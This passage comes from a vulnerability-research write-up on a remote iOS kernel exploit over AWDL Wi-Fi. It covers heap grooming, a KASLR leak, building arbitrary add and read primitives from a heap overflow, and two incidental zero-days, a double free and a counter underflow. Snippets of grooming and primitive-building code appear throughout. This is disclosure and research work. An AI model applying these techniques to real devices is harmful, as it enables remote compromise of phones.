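As a sketch, with constants read roughly off the table above (these values are assumptions, not exact):

#define ZONE_MIN_LO 0xffffffe000100000ULL // just below the lowest observed zone_min
#define ZONE_SLIDE  0x1000000ULL          // ~16MB of base randomization
// any address from here upwards (staying well below zone_max) is inside
// the zone map regardless of the boot-time slide:
#define SAFE_PROBE_BASE (ZONE_MIN_LO + ZONE_SLIDE)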


Our heap groom is as follows:


We send a large number of service_response TLVs, each of which has the following form:


struct service_response_16k_id_tlv sr = {0};

 

sr.type = 2;

sr.len = sizeof(struct service_response_16k_id_tlv) - 3;

sr.s_1 = 2;

sr.key_buf[0] = 'A';

sr.key_buf[1] = 'B';

sr.v_1 = 0x4000;

sr.v_2 = 0x1648; // offset

sr.val_buf[0] = 6;  // msg_type

sr.val_buf[1] = 0x320; // msg_id

sr.val_buf[2] = 0x41414141; // marker

sr.val_buf[3] = val; // value


Each of these TLVs causes the target device to make a 16KB kalloc allocation (one physical page) and then write the following 4 dwords at offset +0x1648:


6

0x320

0x41414141

counter


The counter value increments by one for each TLV we send.


We put 39 of these TLVs in every frame, which will result in the allocation of 39 physical pages, or over 600KB, for each AWDL frame we send, allowing us to rapidly allocate memory.


We split the groom into three sections, first sending a number of these spray frames, then a number of spoofed peers to cause the allocation of a large number of IO80211AWDLPeer objects. Finally we send another large number of the service response TLVs.


This results in a memory layout approximating this:


Inside the safe probe region we aim to place a number of IO80211AWDLPeer objects, surrounded by service_response groom pages with approximately incrementing counter values.


If we now use the BSS Steering arbitrary read primitive to read from near the bottom of the safe probe region at offset +0x1648 from page boundaries, we should hopefully soon find one of the service_response TLV buffers. Since each service_response groom contains a unique counter which we can then read, we can make a guess for the distance between this discovered service_response buffer and the middle of where we think the target peers will be, and so compute a new guess for the location of a target peer. This approach lets us do something like a binary search to find an IO80211AWDLPeer object reasonably efficiently.
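A sketch of that search (bss_steering_read is a hypothetical wrapper around the UMI read primitive; SAFE_PROBE_BASE is from the sketch above, and middle_counter is the counter value we expect near the middle of the groom):

uint64_t guess = SAFE_PROBE_BASE + 0x1648;   // +0x1648 from a page boundary
for (;;) {
  uint32_t leak[4];
  bss_steering_read(guess, leak);            // leaks 4 dwords via the UMI
  if (leak[2] == 0x43434343) break;          // found an IO80211AWDLPeer
  if (leak[2] == 0x41414141) {
    // found a groom page; its counter tells us roughly how many 16KB
    // pages separate us from the peers sprayed in the middle
    guess += ((int64_t)middle_counter - (int64_t)leak[3]) * 0x4000;
  } else {
    guess += 0x4000;                         // unknown page, step forward
  }
}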


Why did I choose to read from offset +0x1648? Because that's also the offset of the sync_tree_macs buffer in the IO80211AWDLPeer where we can place arbitrary data. Each of those middle target peers is created like this:


struct peer_fake_steering_blob {

  uint32_t msg_id;

  uint32_t msg_len;

  uint32_t magic; // 0x43434343 == peer

  struct ether_addr mac; // the MAC of this peer

  uint8_t pad[32];

} __attribute__((packed));

 

struct peer_fake_steering_blob fake_steerer = {0};

 

fake_steerer.msg_id = 6;

fake_steerer.msg_len = 0x320;

fake_steerer.magic = 0x43434343;

fake_steerer.mac = target_groom_peer;

 

inject(RT(),

  WIFI(dst, target_groom_peer),

  AWDL(),

  SYNC_PARAMS(),

  SERV_PARAM(),

  HT_CAPS(),

  DATAPATH(target_groom_peer),

  SYNC_TREE((struct ether_addr*)&fake_steerer,

            sizeof(struct peer_fake_steering_blob)

              /sizeof(struct ether_addr)),

  PKT_END());


The magic value 0x43434343 lets us determine whether our read has found a service_response buffer or a peer. Following that we put the spoofed MAC address of this peer. This allows us to determine which peer has the address we guessed. If we do manage to find a peer allocation we can then examine the remaining bytes of disclosed memory; there's a high probability that following this peer is another peer, and we've disclosed the first few dozen bytes of it. Here's a hexdump of a successfully located peer:


An annotated hexdump of the disclosed memory when two neighbouring IO80211AWDLPeer objects are found. Here you can see the runtime values of the fields in the peer header, including the PAC'ed vtable pointer.


We can see here that we have managed to find two peers next to each other. We'll call these lower_peer and upper_peer. By placing each sprayed peer's MAC address in the sync_tree_macs array we're able to determine both lower_peer and upper_peer's MAC address. Since we know which guessed virtual address we chose we also know the virtual addresses of lower_peer and upper_peer, and from the PAC'ed vtable pointer we can compute the KASLR slide.
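That last step, sketched under the assumption that the PAC signature only occupies the upper pointer bits and enough low address bits survive signing (the masks here are illustrative, not exact):

// strip the signature bits and re-extend to a kernel virtual address
uint64_t vtable_va = 0xfffffff000000000ULL | (leaked_vtable & 0xfffffffffULL);
uint64_t kaslr_slide = vtable_va - UNSLID_VTABLE_ADDR; // from the static kernelcache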


From now on we can easily and repeatedly corrupt the fields seen above by sending a large sync tree TLV containing a modified version of this dumped memory:


Using the disclosed memory we can safely manipulate the lower fields in upper_peer using the SyncTree buffer overflow.

A mild panic?

Accidental 0day 1 of 2

During my experiments to get the BSS Steering state machine working and into the desired state where it would send UMIs, I noticed that the target device would sometimes kernel panic, even when I was very sure that I hadn't triggered the heap overflow vulnerability. As it turns out, I was accidentally triggering another zero-day vulnerability...


oops!


This was slightly concerning as it had now been months since I had reported the first AWDL-based vulnerability to Apple and a fix for that had already shipped. One of my early hopes for Project Zero was that we could have a "research amplification" effect: we would invest significant effort in publicly less-understood areas of vulnerability research and exploitation and present our results to the affected vendors, who would then use their significantly greater resources to continue this research. Vendors have resources such as source code and design documents which should make it vastly easier to audit many of these attack surfaces - we would be keen to assist in this second phase as well.


A more pragmatic view of reality is that whilst the security and product teams do want to continue our research, and do have many more resources, the one important resource they lack is time. Justifying the benefits of fixing a vulnerability which will become public in 90 days is easy but extracting the maximum value from that external report by investing a significant amount of time is much harder to justify; these teams already have other goals and targets for the quarter. Time is the key resource which makes Project Zero successful; we don't have to do vulnerability triage, or design review, or fix bugs or any of the other things typical product security teams have to do.


I mention this because I stumbled over (and reported to Apple) not one but two more remotely-exploitable radio-proximity 0-day vulnerabilities during this research, the first of which appears to have been at least on some level known about:



Mark Dowd is the co-founder of Azimuth, an Australian "market-leading information security business". 


It's well known to all vulnerability researchers that the easiest way to find a new vulnerability is to look very closely at the code near a vulnerability which was recently fixed. They are rarely isolated incidents and usually indicate a lack of testing or understanding across an entire area.


I'm emphasising this point because Mark Dowd's tweet above is claiming knowledge of a variant that wasn't so difficult to find. One that was so easy to find, in fact, that it falls out by accident if you make the slightest mistake when doing BSS Steering. 


We saw the function IO80211AWDLPeer::populateBssSteeringMsgBlob earlier; it's responsible for allocating and populating the steering_msg_blob buffer which will end up as the contents of the 0x1d TLV sent in a AWDL BSS Steering UMI.


At the beginning of the function they check whether this peer already has a steering_msg_blob:


if (this->steering_msg_blob && this->steering_msg_blob_size) {

  ...

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob = 0LL;

}


If it does have one it gets free'd and NULL-ed out.


They then compute the size of the new steering_msg_blob, allocate it and fill it in:


steering_blob_size = *(_DWORD *)(msg + 0x3C) + 0x4F;

this->steering_msg_blob = kalloc(steering_blob_size);

...

this->steering_msg_blob_size = steering_blob_size;


All ok.


Right at the end of the function they then try to add the peer to the "UMI chain" - this is the other linked list of peers with pending UMIs which we saw earlier:


err = 0;

if (this->addPeerToUmiChain()) {

  if ( peer_manager

      && peer_manager->isSafeToSendUmiNow(

  this->chanseq_channels[peer_manager->current_chanseq_step + 1],0)) {

    err = 0;

    // in a shared AW; force UMI timer to expire now

    peer_manager->UMITimer->setTimeoutMS(0);

  }

} else {

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->UMI_feature_mask = 0;

  err = 0xE00002BC;

}

return err;


If the peer gets successfully added to the UMI chain, they test whether they could send the UMI right now (if both this device and the target are in AW's on the same channel). If so, they force the UMI timer to expire, which triggers the code we saw earlier to read the steering_msg_blob, build the UMI template and send it.


However, if addPeerToUmiChain fails then the steering_msg_blob is freed. But unlike the earlier kfree, this time they don't NULL out the pointer before returning. The vulnerability here is that this field is expected to be the owner of that allocation, so if we can somehow come back into populateBssSteeringMsgBlob again the same value will be freed a second time.


There's an even easier way to trigger a double-kfree however: by doing nothing.


After a period of inactivity the IO80211AWDLPeer object will be destructed and free'd. As part of that the IO80211AWDLPeer::freeResources will be called, which does this:


steering_msg_blob = this->steering_msg_blob;

if ( steering_msg_blob ) {

  kfree(steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob = 0LL;

  this->steering_msg_blob_size = 0;

}


This will see a value for steering_msg_blob which has already been freed and free it a second time. If an attacker were able to reallocate the buffer in between the two frees they could get that controlled object freed, leading to a use-after-free.


It actually took some reversing effort to work out how to make addPeerToUmiChain not fail. The trick is that the peer needs to have sent a datapath TLV with the 0x800 flag set in the first dword, and that's why we set that flag.


This vulnerability also opens a different possibility for the initial memory disclosure. By steering multiple peers it's possible to use this to construct a primitive where the target device will attempt to send a UMI containing memory from a steering_msg_blob which has been freed. With some heap grooming this could allow the disclosure of both a stale allocation as well as out-of-bounds data without needing to guess pointers. In the end I chose to stay with the low zone_map entropy technique as I also wanted to try to land this remote kernel exploit using only a single vulnerability.


We'll get back to the exploit now and take a look at accidental 0day 2 of 2 later on...

The path to a write

We've seen that the peer objects seem to be accessed frequently in the background, not just when we're sending frames. This is important to bear in mind as we search for our next corruption target.


One option could be to use the arbitrary free primitive. Maybe we could free a peer object, but this would be tricky as the memory allocator would write metadata over the vtable pointer and the peer might be used in the background before we got a chance to ensure it was safe.


Another possibility could be to cause a type confusion. It's possible that you could find a useful gadget with such a primitive but I figured I'd keep looking for something else.


At this point I started going through more AWDL code looking for all indirect writes I could find. Being able to write even an uncontrolled value to an arbitrary address is usually a good stepping-stone to a full arbitrary memory write primitive.


There's one indirect write which stood out as particularly interesting; right at the start of IO80211AWDLPeer::actionFrameReport:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received += frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp = this->per_second_timestamp;

  absolute_time_now = mach_absolute_time();

  frames_in_last_second = this->n_frames_in_last_second;

  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

    if ( frames_in_last_second >= 0x21 )

      IO80211Peer::logDebug(

        (IO80211Peer *)this,

        "%s[%d] : Received %d Action Frames from peer %02X:%02X:%02X:%02X:%02X:%02X in 1 second. Bad Peer\n",

        "actionFrameReport",

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp = mach_absolute_time();

    this->n_frames_in_last_second = 1;

  }

  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }

  ... // continue on to parse the frame


Those first three lines of the decompiler output are exactly the kind of indirect write we're looking for:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received += frame_len;


The peer_manager field is at offset +0x28 in the peer object, easily corruptible with the linear overflow. The total_bytes_received field is a u32 at offset +0x7c80 in the peer manager, and frame_len is the length of the WiFi frame we send, so we can set this to an arbitrary value, albeit at least 0x69 (the minimum AWDL frame size) and less than 1200 (potentially larger with fragmentation, but it wouldn't help much). That arbitrary value would then get added to the u32 at offset +0x7c80 from the peer_manager pointer. This would be enough to do a byte-by-byte write of arbitrary memory, presuming you knew what was there before:


By corrupting upper_peer's peer_manager pointer then spoofing a frame from upper_peer we can cause an indirect write through the corrupted peer_manager pointer. The peer_manager has a dword field at offset +0x7c80 which counts the total number of bytes received from all peers; actionFrameReport will add the length of the frame spoofed from upper_peer to the dword at the corrupted peer_manager pointer + 0x7c80, giving us an arbitrary add primitive.
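Put concretely, a sketch of the primitive using the offsets above:

// overwrite upper_peer's peer_manager field (+0x28) via the overflow:
uint64_t fake_peer_manager = add_target - 0x7c80;
// then spoof a frame from upper_peer; actionFrameReport will do:
//   *(uint32_t *)(fake_peer_manager + 0x7c80) += frame_len;
// with 0x69 <= frame_len < 1200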


We do have a limited read primitive already, probably enough to bootstrap ourselves to a full arbitrary read and therefore full arbitrary write. We can indeed reach this code with a corrupted peer_manager pointer and get an arbitrary add primitive. There's just one tiny problem, which will take many more weeks to solve: We'll panic immediately after the write.

Getting the timing right

Although the IO80211AWDLPeer's peer_manager field doesn't appear to be used often in the background (unlike the vtable), it will be used later on in the actionFrameReport method, and since we're trying to write to arbitrary addresses it will almost certainly cause a panic.


Looking at the code, there is only one safe path out of actionFrameReport:


  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

    if (frames_in_last_second >= 0x21)

      IO80211Peer::logDebug(

        (IO80211Peer *)this,

        "%s[%d] : Received %d Action Frames from peer %02X:%02X:%02X:%02X:%02X:%02X in 1 second. Bad Peer\n",

        "actionFrameReport",

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp = mach_absolute_time();

    this->n_frames_in_last_second = 1;

  }

  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }


We have to reach that return 0 statement, which means we need the first if clause to be false, and the second one to be true.


The first statement checks whether more than 1024 ms have elapsed since the per_second_timestamp was updated.


The second statement checks whether more than 32 frames have been received since the per_second_timestamp was last updated.


So to reach the return 0 and avoid the panics due to an invalid peer_manager pointer, we'd need to ensure that 33 frames (including the one triggering the add) have been received from the same spoofed peer within a 1024ms period.


You are hopefully starting to see now why the ACK sniffing model is advantageous compared to the timing model; if the target had only received 31 frames then attempting the arbitrary add would cause a kernel panic.


Recall that at this point however I'm using a 2.4GHz-only WiFi adaptor for injection and monitoring and the only data rate I can get to work is 1Mbps. Actually getting 33 frames onto the air inside 1024ms, especially as only a fraction of that time will be AWDL Availability Windows, is probably impossible.


Furthermore, as I suddenly need far more accuracy in terms of knowing whether frames were received or not, I start to notice how unreliable my monitor device is. It appears to be frequently dropping frames, with an error rate seemingly positively correlated with how long the adapter has been plugged in. After a while my testing model includes having to unplug the injection and monitoring adaptors after each test to let them cool down. This hopefully gives a taste of how frustrating many parts of this exploit development process were. Without a stable and fast testing setup, prototyping ideas is painfully slow, and figuring out whether an idea didn't work is made harder because you never know if your idea didn't work, or if it was yet another hardware failure.

Changing the clocks

It's probably impossible to make the timing checks pass using intended behaviour with the current setup. But we still have a few tricks up our sleeve. We do have a memory corruption vulnerability after all.


Looking at the two relevant fields per_second_timestamp and n_frames_in_last_second we notice that they're at the following offsets:


/* +0x1648 */  struct ether_addr sync_tree_macs[10];

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;

/* +0x16A0 */  uint32_t steering_msg_blob_size;


So the timestamp (which is absolute, not relative) and the frame count are just after the sync tree buffer which we can overflow out of, meaning we can reliably corrupt them and provide a fake timestamp and count.


Arbitrary add idea 1: clock synchronization

My first idea was to try to determine the delta between the target device's absolute clock and the Raspberry Pi running the exploit. Then safely triggering an arbitrary add would be a three step process:


1) Compute a valid per_second_timestamp value at a point just in the future and do a short overflow within upper_peer to give it that arbitrary timestamp and a high n_frames_in_last_second value.


2) Do a long overflow from lower_peer to corrupt upper_peer's peer_manager pointer to point 0x7c80 bytes below the arbitrary add target.


3) Spoof a frame from upper_peer where the length corresponds to the size of the arbitrary add. As long as the timestamp we wrote in step 1 is less than 1024ms earlier than the target device's current clock, and the n_frames_in_last_second is still large, we'll hit the early error return path.


To pull this off we'll need to synchronize our clocks. AWDL itself is built on accurate timing and there are timing values in each AWDL frame. But they don't really help us that much because those are relative timestamps whereas we need absolute timestamps.


Luckily we already have a restricted read primitive, and in fact we've already accidentally used it to leak a timestamp:


The same annotated hexdump from the initial read primitive when it found two neighbouring peers. At offset +0x43 in the dump we can see the per_second_timestamp value. We'd now like to leak one of these which we force to be set at an exact moment in time.


We can use the initial limited arbitrary read primitive again under more controlled conditions to try to determine the clock delta like this:


1) Wait 1024 ms.


2) Spoof a frame from lower_peer, which will cause it to get a fresh per_second_timestamp.


3) When we receive an ACK, record the current timestamp on the Raspberry Pi.


4) Use the BSS Steering read to read lower_peer's timestamp.


5) Convert the two timestamps to the same units and compute the delta.
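Step 5's conversion looks roughly like this; the target's mach timebase ratio is an assumption here (24MHz, i.e. numer/denom of 125/3, is typical for arm64 devices):

uint64_t peer_ns  = leaked_timestamp * 125ULL / 3ULL;  // ticks -> nanoseconds
int64_t  delta_ns = (int64_t)(pi_ns_at_ack - peer_ns); // clock delta
// later, a fake timestamp valid "now" on the target:
uint64_t fake_ts  = ((pi_now_ns - delta_ns) * 3ULL) / 125ULL;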


Now we can perform the arbitrary write as described above by using the SyncTree overflow inside upper_peer to give it a fake and valid per_second_timestamp and n_frames_in_last_second value. This works, and we can add an arbitrary byte to an arbitrary address!


Unfortunately it's not very reliable. There are too many things to go wrong here, and for a painful couple of weeks everything went wrong. Firstly, as previously discussed, the injection and monitoring hardware is just too unreliable. If we miss ACKs we end up getting the clock delta wrong, and if the clock delta is too wrong we'll panic the target. Also, we're still sending frames very slowly, and the slower this all happens the lower the probability that our fake timestamp stays valid by the time it's used. We need an approach which is going to work far more reliably.

More timing tricks

Having to synchronize the clocks is fragile. Looking more closely at the code, I realized there was another way to reach the error bail out path without manually syncing.


If we wait 1024ms then spoof a frame, the peer structure will get a fresh timestamp which will pass the timestamp check for the next 1024ms. 


We can't do that and then overflow into the n_frames_in_last_second field, because that field is after the per_second_timestamp so we'd corrupt it. But there is actually a way to corrupt the n_frames_in_last_second field without touching the timestamp:


1) Wait 1024ms then spoof a valid frame from upper_peer, giving its IO80211AWDLPeer object a valid per_second_timestamp.


2) Overflow from lower_peer into upper_peer, setting upper_peer's peer_manager pointer to 0x7c80 bytes before upper_peer's frames_in_last_second counter.


3) Spoof a valid frame from upper_peer.


Let's look more closely at exactly what will happen now:


It's now the case that this->peer_manager points 0x7c80 bytes below upper_peer->n_frames_in_last_second when IO80211AWDLPeer::actionFrameReport gets called on upper_peer:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);


Because we've corrupted upper_peer's peer_manager pointer, peer_manager->total_bytes_received overlaps with upper_peer->n_frames_in_last_second, meaning this add will add the frame length to upper_peer->n_frames_in_last_second! The important part is that this write happens before n_frames_in_last_second is checked!


  peer_manager->total_bytes_received += frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp = this->per_second_timestamp;

  absolute_time_now = mach_absolute_time();

  frames_in_last_second = this->n_frames_in_last_second;


And if we're fast enough we'll still pass this check, because we have a real timestamp:


  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

     ...

  }


and now we'll also pass this check and return:


  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }


We've now got a timestamp still valid for some portion of 1024ms and n_frames_in_last_second is very large, without having to send that many frames within the 1024ms window or having to manually synchronize the clocks.


The fourth step is then to overflow again from lower_peer to upper_peer, this time pointing peer_manager to 0x7c80 below the desired add target. Finally, spoof a frame from upper_peer, padded to the correct size for the desired add value.
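The two corrupted peer_manager values used in this sequence, as a sketch (offsets from the reversed structs above):

// step 2: alias total_bytes_received (+0x7c80) with upper_peer's own
// n_frames_in_last_second counter (+0x1690):
uint64_t stage_one_pm = upper_peer_addr + 0x1690 - 0x7c80;
// step 4: point the counter at the real add target:
uint64_t stage_two_pm = add_target - 0x7c80;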

Another timing trick

The final timing trick for now was to realize we could skip the initial 1024ms wait by first overflowing within upper_peer to set its timestamp to 0. Then the next valid frame spoofed from upper_peer would be sure to set a valid per_second_timestamp usable for the next 1024 ms. In this way we can use the arbitrary write quite quickly, and start building our next primitive. Except...

I'm still panicking...

Earlier I accidentally discovered another exploitable zero day. Fortunately it was fairly easy to avoid triggering it, but my exploit continued to panic the target device in a multitude of ways. Of course, as before, I'd sort of expect this and indeed I worked out a few ways in which I was potentially causing panics.


One was that when I was overwriting the peer_manager pointer I was also overwriting the flink and blink pointers of the peer in the linked list of peers. If peers had been added or removed from the list since I had taken the copy of those pointers I could now be corrupting the list, potentially adding back stale pointers or altering the order. This was bound to cause problems so I added a workaround: I would ensure that no spoofed peers ever got freed. This is simple to implement; just ensure every peer spoofs a frame around every 20 seconds or so and you'll be fine.


But my test device was still panicking, so I decided to really dig into some of the panics and work out exactly what seems to be happening. Am I accidentally triggering yet another zero-day?

More accidental zero-day

After a day or so of analysis and reversing I realize that yes, this is in fact another exploitable zero-day in AWDL. This is the third, also reachable in the default configuration of iOS.


This vulnerability took significantly more effort to understand than the double free. The condition is more subtle and boils down to a failure to clear a flag. With no upfront knowledge of the names or purposes of these flags (and there are hundreds of flags in AWDL) it required a lot of painstaking reverse engineering to work out what's going on. Let's dive in.


resetAndRemovePeerInfo is a member method of the IO80211PeerBssSteeringManager. It's called when a peer is being destructed:


IO80211PeerBssSteeringManager::resetAndRemovePeerInfo(

  IO80211AWDLPeer *peer) {

 

  struct BssSteeringCntx *cntx;

 

  if (!peer) {

    // log error and return

  }

 

  peer->added_to_fw_cache = 0;

 

  cntx = this->steering_cntx;

 

  if (cntx->peer_count) {

    for (uint64_t i = 0; i < cntx->peer_count; i++) {

      if (memcmp(&cntx->peer_macs[i], &peer->peer_mac, 6uLL) == 0) {

        memset(&cntx->peer_macs[i], 0, 6uLL); 

      }

    };

  }

  cntx->peer_count--;

}


We can see a callsite here in IO80211AWDLPeerManager::removePeer:


if (peer->added_to_fw_cache) {

  if (this->steering_manager)  {

    this->steering_manager->resetAndRemovePeerInfo(peer);

  }

}


added_to_fw_cache is a name I have given to the flag field at +0x4b8 in IO80211AWDLPeer. We can see that if a peer with that flag set is destructed then the peer manager will call the steering_manager's resetAndRemovePeerInfo method shown above.


resetAndRemovePeerInfo clears that flag then iterates through the steering context object's array of currently-being-steered peer MAC addresses. If the peer being destructed's MAC address is found in there, then it's memset to 0.


The logic already looks a little odd; they decrement peer_count but don't shrink the size of the array by swapping the empty slot with the last valid entry, meaning it will only work correctly if the peers are destructed in the exact reverse order that they were added. Kinda weird, but probably not a security vulnerability.


The logic of this function means peer_count will be decremented each time it runs. But what would happen if this function were called more times than the initial value of peer_count? In the first extra invocation the memcmp loop wouldn't execute and peer_count would be decremented from 0 to 0xffffffff, but in the second extra invocation, the peer_count is non-zero, so it would enter the memcmp/memset loop. But the only loop termination condition is i >= peer_count, so this loop will try to run 4 billion times, certainly going off the end of the 8 entry peer_macs array:


struct __attribute__((packed)) BssSteeringCntx {

/* +0x0000 */  uint32_t first_field;

/* +0x0004 */  uint32_t service_type;

/* +0x0008 */  uint32_t peer_count;

/* +0x000C */  uint32_t role;

/* +0x0010 */  struct ether_addr peer_macs[8];

/* +0x0040 */  struct ether_addr infraBSSID;

/* +0x0046 */  uint8_t pad4[6];

/* +0x004C */  uint32_t infra_channel_from_datapath_tlv;

/* +0x0050 */  uint8_t pad8[8];

/* +0x0058 */  char ssid[32];

/* +0x0078 */  uint8_t pad1[12];

/* +0x0084 */  uint32_t num_peers_added_to_umi;

/* +0x0088 */  uint8_t pad_10;

/* +0x0089 */  uint8_t pendingTransitionToNewState;

/* +0x008A */  uint8_t pad7[2];

/* +0x008C */  enum BSSSteeringState current_state;

/* +0x0090 */  uint8_t pad5[8];

/* +0x0098 */  struct IOTimerEventSource *bssSteeringExpiryTimer;

/* +0x00A0 */  struct IOTimerEventSource *bssSteeringStageExpiryTimer;

/* +0x00A8 */  uint8_t pad9[8];

/* +0x00B0 */  uint32_t steering_policy;

/* +0x00B4 */  uint8_t inProgress;

}

My reverse engineered version of the BSS Steering context object. I've managed to name most of the fields.


This is only a vulnerability if it's possible to call this function peer_count+2 times. (To decrement peer_count down to 0, then set it to -1, then re-enter with peer_count = -1.)


Whether or not resetAndRemovePeerInfo is called when a peer is destructed depends only on whether that peer has the added_to_fw_cache flag set; this gives us an inequality: the number of peers with added_to_fw_cache set must be less than or equal to peer_count+1. Probably it's really meant to be the case that peer_count should be equal to the number of peers with that flag set. Is that the case?


No, it's not. After steering fails we restart the BSS Steering state machine by sending a new BSSSteering TLV with a steeringMsgID of 6 rather than 0; this means the steering state machine gets a BSS_STEERING_REMOTE_STEERING_TRIGGER event rather than the BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD which was used to start it. This resets the steering context object, filling the peer_macs array with whatever new peer macs we specify in the new DIRECTED_STEERING_CMD TLV. If we specify different peers to those already in the context's peer_macs array, then those old entries' corresponding IO80211AWDLPeer objects don't have their added_to_fw_cache field cleared, but the new peers do get that flag set.


This means that the number of peers with the flag set becomes greater than context->peer_count, so as the peers eventually get destructed peer_count goes down to zero, underflows, and then causes memory corruption.


I was hitting this condition each time I restarted steering, though it would take some time for the device to actually kernel panic because the steered peers needed to timeout and get destructed.


Root causing this second bonus remotely-triggerable iOS kernel memory corruption was much harder than the first bonus double free; the explanation given above took a few days' work. It was necessary though as I had to work around both of these vulnerabilities to ensure I didn't accidentally trigger them, which in total added a significant amount of extra work.


The work-around in this case was to ensure that I only ever restarted steering the same peers; with that change we no longer hit the peer_count underflow and only corrupt the memory we're trying to corrupt! This issue was fixed in iOS 13.6 as CVE-2020-9906.


The target is no longer randomly kernel panicking even when we don't trigger the intended Sync Tree heap overflow, so let's get back to the exploit.

Add to read

We have an arbitrary add primitive but it's not quite an arbitrary write yet. For that, we need to know the original values at the target address so we can compute the correct frame size to add to each byte, letting us write a truly arbitrary value.


Probably we'll have to use the arbitrary add to corrupt something in a peer or the peer manager such that we can get it to follow an arbitrary pointer when building an MI or PSF frame which will be sent over the air.


I went back to IDA and spent a long time looking through code to search for such a primitive, and found one in the construction of the Service Request Descriptor TLVs in MI frames:


IO80211AWDLPeerManager::buildMasterIndicationTemplate

  (char *buffer, u32 total_size ...

...

  req_desc = this->req_desc;

  if ( req_desc ){

    desc_len = req_desc->desc_len;        // length

    desc_ptr = req_desc->desc_ptr;

    tlv_len = desc_len+4;

    if (desc_len && desc_ptr && tlv_len < remaining) {

      buffer[offset] = 16; // type

      *(u16*)&buffer[offset+1] = desc_len + 1; // len

      buffer[offset+3] = 3;

      IO80211ServiceRequestDescriptor::copyDataOnly(

        req_desc,

        &buffer[offset+4],

        total_size - offset - 4);

    }


This is reading an IO80211ServiceRequestDescriptor object pointer from the peer manager from which it reads another pointer and a length. If there's space in the MI frame for that length of buffer then it calls the RequestDescriptor's copyDataOnly method, which simply copies from the RequestDescriptor into the MI frame template. It's only reading these two pointer and length fields which are at offset +0x40 and +0x54 in the request descriptor, so by pointing the IO80211AWDLPeerManager's req_desc pointer to data we control we can cause the next MI template which is generated to contain data read from an arbitrary address, this time with no restrictions on the data being read.


We can use the limited read primitive we currently have to read the existing value of the req_desc pointer, we just need to find somewhere below it in the peer_manager object where we know there will always be a fixed, small dword we can use as the length value needed for the read. Indeed, a few bytes below this there is such a value.


The first trick is in choosing somewhere to point the req_desc pointer to. We want to choose somewhere where we can easily update the read target without having to trigger the memory corruption. From reading the TLV parsing code I knew there were some TLVs which have very little processing. A good example, and the one I chose to use, is the NSync TLV. The only processing is to check that the total TLV length including the header is less than or equal to 0x40. That entire TLV is then memcpy'ed into a 0x40 byte buffer in the peer object at offset +0x4c4:


memcpy(this->nsync_tlv_buf, tlv_ptr, tlv_total_len);


We can use the arbitrary write to point the peer_manager's req_desc pointer to just below the lower_peer's nsync_tlv buffer such that by spoofing NSync TLVs from lower_peer we can update the fake descriptor pointer and length values.
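In other words, a sketch with the field offsets as reversed above:

// place the fake descriptor so its two fields (+0x40 and +0x54) land
// inside lower_peer's 0x40-byte nsync_tlv_buf at +0x4c4:
uint64_t fake_req_desc = lower_peer_addr + 0x4c4 - 0x40;
// bytes 0x00 and 0x14 of each spoofed NSync TLV now supply the fake
// descriptor's length and pointer for the next read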


Some care needs to be taken when corrupting the req_desc pointer however as we can currently only do byte-by-byte writes and the req_desc pointer might be read while we are corrupting it. We therefore need a way to stop those reads.


IO80211AWDLPeerManager::updateBroadcastMI is on the critical path for the read, meaning that every time the MI frame is updated it must go through this function, which contains the following check:


if (this->frames_outstanding <= this->frames_limit) {

  IO80211AWDLPeerManager::updatePrimaryPayloadMI(...


frames_limit is initialized to a fixed value of 3. If we first use the arbitrary add to make frames_outstanding very large, this check will fail, the MI template won't be updated and the req_desc member won't be read. Then, after we're done corrupting the req_desc pointer, we can set this value back to its original value and the MI templates will be updated again and the arbitrary read will work.


An easy way to do this is to add 0x80 to the most-significant byte of frames_outstanding. The first time we do this it will make frames_outstanding very large: if it were 2 to begin with it would go from 0x00000002 to 0x80000002.


Adding 0x80 to that MSB a second time would cause it to overflow back to 0, resetting the value to 2 again. This of course has the side effect of adding 1 to the next dword field in the peer_manager when it overflows, but fortunately this doesn't cause any problems.
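
As a sketch, the pause/resume dance looks like this, again with add8() as a hypothetical wrapper around the arbitrary add and FRAMES_OUTSTANDING_OFF standing in for the real offset of frames_outstanding in the peer manager:

uint64_t msb = peer_manager + FRAMES_OUTSTANDING_OFF + 3; // most-significant byte
add8(msb, 0x80); // 0x00000002 -> 0x80000002: MI template updates stop
// ... corrupt the req_desc pointer byte-by-byte, it's no longer being read ...
add8(msb, 0x80); // MSB wraps: back to 0x00000002, MI template updates resume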


Now by spoofing an NSync TLV from lower_peer and monitoring for a change in the contents of the 0x10 TLV sent by the target in MI frames we can read arbitrary kernel data from arbitrary addresses.

Speedy reader

